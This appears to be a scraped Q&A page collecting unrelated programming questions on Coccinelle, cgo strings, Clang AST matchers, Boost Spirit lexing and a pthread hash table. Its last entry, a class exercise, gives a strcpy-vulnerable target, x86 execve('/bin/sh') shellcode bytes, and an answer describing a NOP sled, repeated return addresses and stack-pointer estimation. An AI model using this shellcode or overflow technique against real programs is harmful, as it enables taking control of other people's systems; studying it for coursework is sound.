Coccinelle help to replace a function with variable args - coccinelle

I have something like this
void test_fn(int a, ...)
{
...
}
int main(int argc, char *argv[])
{
int b,a1,a2,a3;
....
b = test_fn(a1,a2,a3);
return 0;
}
I want to replace test_fn with a different function func_1. Both test_fn and func_1 have variable arguments.
What I want is
test_fn(a1,a2,a3)// to be replaced by
func_1(x1,a2,a3)
i.e I want to replace the first arg with a different one and retain all other args.
I'm brand new to coccinelle and I came up with this with a bit of googling
## expression E;
identifier test_fn;##
-test_fn(E, ...)
+func_1(x)
Not sure how to add the variable args though. Any help would be appreciated

Related

How do I pass a "C" string from a "C" routine to a GO function (and convert it to a GO string?)

This must be something really silly and basic, but the cgo docs (and google fu) have left me stranded. Here's what I am trying to do: I want a GO function to call a "C" function using 'import "C"'. Said "C" function needs to store the address of a "C" string (malloc or constant - neither has worked for me) into an argument passed to it as *C.char. The GO function then needs to convert this to a GO string. It actually does work, except I get this:
panic: runtime error: cgo argument has Go pointer to Go pointer
If I run with GODEBUG=cgocheck=0, it all works fine. If I leave as default:
strptr = 4e1cbf ('this is a C string!')
main: yylex returned token 1
yylval.tstrptr 4e1cbf
stringval token "this is a C string!"
The problematic line seems to be:
yylval.stringval = C.GoString(yylval.tstrptr)
What little I can find about C.GoString, it left me with the impression that it allocates a GO string, and fills it in from the "C" string provided, but that seems to not be the case, or why am I getting a complaint about 'Go pointer to Go pointer'? I've tried a number of other approaches, like having the "C" function malloc the buffer and the GO function do C.free() on it. Nothing has worked (where worked == avoiding this runtime panic).
The GO source:
package main
import (
"fmt"
"unsafe"
)
// #include <stdio.h>
// int yylex (void * foo, void *tp);
import "C"
type foo_t struct {
i int32
s string
}
var foo foo_t
func main() {
var retval int
var s string
var tp *C.char
for i := 0; i < 2; i++ {
retval = int(C.yylex(unsafe.Pointer(&foo), unsafe.Pointer(&tp)))
fmt.Printf("main: yylex returned %d\n", retval)
fmt.Printf("tp = %x\n", tp)
if retval == 0 {
s = C.GoString(tp)
fmt.Printf("foo.i = %d s = %q\n", foo.i, s)
} else {
foo.s = C.GoString(tp)
fmt.Printf("foo.i = %d foo.s = %q\n", foo.i, foo.s)
}
}
}
The "C" source
#include <stdio.h>
int yylex (int * foo, char ** tp)
{
static num;
*foo = 666;
*tp = "this is a C string!";
printf ("strptr = %x ('%s')\n", *tp, *tp);
return (num++);
}
What's interesting is that if the GO func stores into foo.s first, the 2nd call to yylex bombs with the panic. If I do s and then foo.s (depending on whether I check retval as 0 or non-zero), it doesn't fail, but I'm guessing that is because the GO function exits right away and there are no subsequent calls to yylex.

Building call graphs using Clang AST, link parameters to arguments

I am trying to build call graphs using Clang AST.
Is there a way to somehow link the parameters of a function to the arguments of an inner function call?
For example, given the following function:
void chainedIncrement(int *ptr) {
simplePointerIncr(ptr);
for (int i=0;i<3;i++) {
simplePointerIncr(ptr);
}
}
I looking for a way to be able to link ptr from chainedIncrement function to the argument of simplePointerIncr function. Doing this will allow building a call graph.
Maybe there is a way of getting the same id while calling getId() on parameters and arguments.
I tried to use the following AST matcher:
functionDecl(hasDescendant(callExpr(callee(functionDecl().bind("calleeFunc")),unless(isExpansionInSystemHeader())).bind("callExpr");)).bind("outerFunc")
It seems that arguments are of type Expr while function parameters are of type ParmVarDecl.
Assuming that the parameter is passed as-is, without modification to an inner function, is there a way to link them somehow?
Thanks
UPDATE: Added my solution
There is a matcher called forEachArgumentWithParam(). It allows to bind arguments to a callee function to its parameters.
Another matcher, equalsBoundNode() allows to bind the parameters of the outer function, to the arguments of the callee function.
auto calleeArgVarDecl = declRefExpr(to(varDecl().bind("callerArg")));
auto innerCallExpr = callExpr(
forEachArgumentWithParam(calleeArgVarDecl, parmVarDecl().bind("calleeParam")),
callee(functionDecl().bind("calleeFunc")),unless(isExpansionInSystemHeader())).bind("callExpr");
auto fullMatcher = functionDecl(forEachDescendant(innerCallExpr),forEachDescendant(parmVarDecl(equalsBoundNode("callerArg")).bind("outerFuncParam"))).bind("outerFunc");
Here is a simplified example:
int add2(int var) {
return var+2;
}
int caller(int var) {
add2(var);
for (int i=0; i<3; i++) {
add2(var);
}
return var;
}
int main(int argc, const char **argv) {
int ret = 0;
caller(ret);
return 0;
}
use Clang-query to show the matcher result:
clang-query> match callExpr(hasAnyArgument(hasAncestor(functionDecl(hasName("caller")))))
Match #1:
~/main.cpp:5:3: note: "root" binds here
add2(var);
^~~~~~~~~
Match #2:
~/main.cpp:7:5: note: "root" binds here
add2(var);
^~~~~~~~~
2 matches.
It matches the function calls that use the parameter of function caller
There is a matcher called forEachArgumentWithParam(). It allows to bind arguments to a callee function to its parameters.
Another matcher, equalsBoundNode() allows to bind the parameters of the outer function, to the arguments of the callee function.
auto calleeArgVarDecl = declRefExpr(to(varDecl().bind("callerArg")));
auto innerCallExpr = callExpr(
forEachArgumentWithParam(calleeArgVarDecl, parmVarDecl().bind("calleeParam")),
callee(functionDecl().bind("calleeFunc")),unless(isExpansionInSystemHeader())).bind("callExpr");
auto fullMatcher = functionDecl(forEachDescendant(innerCallExpr),forEachDescendant(parmVarDecl(equalsBoundNode("callerArg")).bind("outerFuncParam"))).bind("outerFunc");

Case Insensitive String Comparison of Boost::Spirit Token Text in Semantic Action

I've got a tokeniser and a parser. the parser has a special token type, KEYWORD, for keywords (there are ~50). In my parser I want to ensure that the tokens are what I'd expect, so I've got rules for each. Like so:
KW_A = tok.KEYWORDS[_pass = (_1 == "A")];
KW_B = tok.KEYWORDS[_pass = (_1 == "B")];
KW_C = tok.KEYWORDS[_pass = (_1 == "C")];
This works well enough, but it's not case insensitive (and the grammar I'm trying to handle is!). I'd like to use boost::iequals, but attempts to convert _1 to an std::string result in the following error:
error: no viable conversion from 'const _1_type' (aka 'const actor<argument<0> >') to 'std::string' (aka 'basic_string<char>')
How can I treat these keywords as strings and ensure they're the expected text irrespective of case?
A little learning went a long way. I added the following to my lexer:
struct normalise_keyword_impl
{
template <typename Value>
struct result
{
typedef void type;
};
template <typename Value>
void operator()(Value const& val) const
{
// This modifies the original input string.
typedef boost::iterator_range<std::string::iterator> iterpair_type;
iterpair_type const& ip = boost::get<iterpair_type>(val);
std::for_each(ip.begin(), ip.end(),
[](char& in)
{
in = std::toupper(in);
});
}
};
boost::phoenix::function<normalise_keyword_impl> normalise_keyword;
// The rest...
};
And then used phoenix to bind the action to the keyword token in my constructor, like so:
this->self =
KEYWORD [normalise_keyword(_val)]
// The rest...
;
Although this accomplishes what I was after, It modifies the original input sequence. Is there some modification I could make so that I could use const_iterator instead of iterator, and avoid modifying my input sequence?
I tried returning an std::string copied from ip.begin() to ip.end() and uppercased using boost::toupper(...), assigning that to _val. Although it compiled and ran, there were clearly some problems with what it was producing:
Enter a sequence to be tokenised: select a from b
Input is 'select a from b'.
result is SELECT
Token: 0: KEYWORD ('KEYWOR')
Token: 1: REGULAR_IDENTIFIER ('a')
result is FROM
Token: 0: KEYWORD ('KEYW')
Token: 1: REGULAR_IDENTIFIER ('b')
Very peculiar, it appears I have some more learning to do.
Final Solution
Okay, I ended up using this function:
struct normalise_keyword_impl
{
template <typename Value>
struct result
{
typedef std::string type;
};
template <typename Value>
std::string operator()(Value const& val) const
{
// Copy the token and update the attribute value.
typedef boost::iterator_range<std::string::const_iterator> iterpair_type;
iterpair_type const& ip = boost::get<iterpair_type>(val);
auto result = std::string(ip.begin(), ip.end());
result = boost::to_upper_copy(result);
return result;
}
};
And this semantic action:
KEYWORD [_val = normalise_keyword(_val)]
With (and this sorted things out), a modified token_type:
typedef std::string::const_iterator base_iterator;
typedef boost::spirit::lex::lexertl::token<base_iterator, boost::mpl::vector<std::string> > token_type;
typedef boost::spirit::lex::lexertl::actor_lexer<token_type> lexer_type;
typedef type_system::Tokens<lexer_type> tokens_type;
typedef tokens_type::iterator_type iterator_type;
typedef type_system::Grammar<iterator_type> grammar_type;
// Establish our lexer and our parser.
tokens_type lexer;
grammar_type parser(lexer);
// ...
The important addition being boost::mpl::vector<std::string> >. The result:
Enter a sequence to be tokenised: select a from b
Input is 'select a from b'.
Token: 0: KEYWORD ('SELECT')
Token: 1: REGULAR_IDENTIFIER ('a')
Token: 0: KEYWORD ('FROM')
Token: 1: REGULAR_IDENTIFIER ('b')
I have no idea why this has corrected the problem so if someone could chime in with their expertise, I'm a willing student.

What this cast and assignment is all about?

I am reading Richard Stevens' Advance Programming in unix environment.
There is a code in thread synchronization category (chapter - 11).
This is code showing is showing how to avoid race conditions for many shared structure of same type.
This code is showing two mutex for synch.- one for a list fh (a list which keep track of all the foo structures) & f_next field and another for the structure foo
The code is:
#include <stdlib.h>
#include <pthread.h>
#include <stdio.h>
#include <unistd.h>
#define NHASH 29
#define HASH(fp) (((unsigned long)fp)%NHASH)
struct foo *fh[NHASH];
pthread_mutex_t hashlock = PTHREAD_MUTEX_INITIALIZER;
struct foo {
int f_count;
pthread_mutex_t f_lock;
struct foo *f_next; /* protected by hashlock */
int f_id;
/* ... more stuff here ... */
};
struct foo * foo_alloc(void) /* allocate the object */
{
struct foo *fp;
int idx;
if ((fp = malloc(sizeof(struct foo))) != NULL) {
fp->f_count = 1;
if (pthread_mutex_init(&fp->f_lock, NULL) != 0) {
free(fp);
return(NULL);
}
idx = HASH(fp);
pthread_mutex_lock(&hashlock);
///////////////////// HERE -----------------
fp->f_next = fh[idx];
fh[idx] = fp->f_next;
//////////////////// UPTO HERE -------------
pthread_mutex_lock(&fp->f_lock);
pthread_mutex_unlock(&hashlock);
/* ... continue initialization ... */
pthread_mutex_unlock(&fp->f_lock);
}
return(fp);
}
void foo_hold(struct foo *fp) /* add a reference to the object */
.......
The doubt is
1) What is HASH(fp) pre-processor doing?
I know that it is typecasting what is fp store and then taking its modulo. But, in the function foo_alloc we are just passing the address of newly allocated foo structure.
Why we are doing this I know that this will give me a integer between 0 and 28 - to store in array fh. But why are we taking modulo of an address. Why there is so much randomization?
2) Suppose i accept that, now after this what these two lines are doing (also highlighted in the code) :
fp->f_next = fh[idx];
fh[idx] = fp->f_next;
I hope initially fh[idx] has any garbage value which i assigned to the f_next field of foo and in the next line what is happening , again the same assignment but in opposite order.
struct foo *fh[NHASH] is a hash table, and use the HASH macro as the hash function.
1) HASH(fp) calculates the index to decide where the in the fh to store fp, and it uses the address of the fp and uses the address as key to calculate the index. We can easily typecast the address to the long type.
2) Use the linked list to avoid the hash collisions called separate chaining, and I think the following cod is right, and you can check it in the book :
fp->f_next = fh[idx];
fh[idx] = fp;
insert the fp element to the header of the linked list fh[idx], and the initial value of the fh[idx] is null.

Intentional buffer overflow exploit program

I'm trying to figure out this problem for one of my comp sci classes, I've utilized every resource and still having issues, if someone could provide some insight, I'd greatly appreciate it.
I have this "target" I need to execute a execve(“/bin/sh”) with the buffer overflow exploit. In the overflow of buf[128], when executing the unsafe command strcpy, a pointer back into the buffer appears in the location where the system expects to find return address.
target.c
int bar(char *arg, char *out)
{
strcpy(out,arg);
return 0;
}
int foo(char *argv[])
{
char buf[128];
bar(argv[1], buf);
}
int main(int argc, char *argv[])
{
if (argc != 2)
{
fprintf(stderr, "target: argc != 2");
exit(EXIT_FAILURE);
}
foo(argv);
return 0;
}
exploit.c
#include "shellcode.h"
#define TARGET "/tmp/target1"
int main(void)
{
char *args[3];
char *env[1];
args[0] = TARGET; args[1] = "hi there"; args[2] = NULL;
env[0] = NULL;
if (0 > execve(TARGET, args, env))
fprintf(stderr, "execve failed.\n");
return 0;
}
shellcode.h
static char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
I understand I need to fill argv[1] with over 128 bytes, the bytes over 128 being the return address, which should be pointed back to the buffer so it executes the /bin/sh within. Is that correct thus far? Can someone provide the next step?
Thanks very much for any help.
Well, so you want the program to execute your shellcode. It's already in machine form, so it's ready to be executed by the system. You've stored it in a buffer. So, the question would be "How does the system know to execute my code?" More precisely, "How does the system know where to look for the next code to be executed?" The answer in this case is the return address you're talking about.
Basically, you're on the right track. Have you tried executing the code? One thing I've noticed when performing this type of exploit is that it's not an exact science. Sometimes, there are other things in memory that you don't expect to be there, so you have to increase the number of bytes you add into your buffer in order to correctly align the return address with where the system expects it to be.
I'm not a specialist in security, but I can tell you a few things that might help. One is that I usually include a 'NOP Sled' - essentially just a series of 0x90 bytes that don't do anything other than execute 'NOP' instructions on the processor. Another trick is to repeat the return address at the end of the buffer, so that if even one of them overwrites the return address on the stack, you'll have a successful return to where you want.
So, your buffer will look like this:
| NOP SLED | SHELLCODE | REPEATED RETURN ADDRESS |
(Note: These aren't my ideas, I got them from Hacking: The Art of Exploitation, by Jon Erickson. I recommend this book if you're interested in learning more about this).
To calculate the address, you can use something similar to the following:
unsigned long sp(void)
{ __asm__("movl %esp, %eax");} // returns the address of the stack pointer
int main(int argc, char *argv[])
{
int i, offset;
long esp, ret, *addr_ptr;
char* buffer;
offset = 0;
esp = sp();
ret = esp - offset;
}
Now, ret will hold the return address you want to return to, assuming that you allocate buffer to be on the heap.

Resources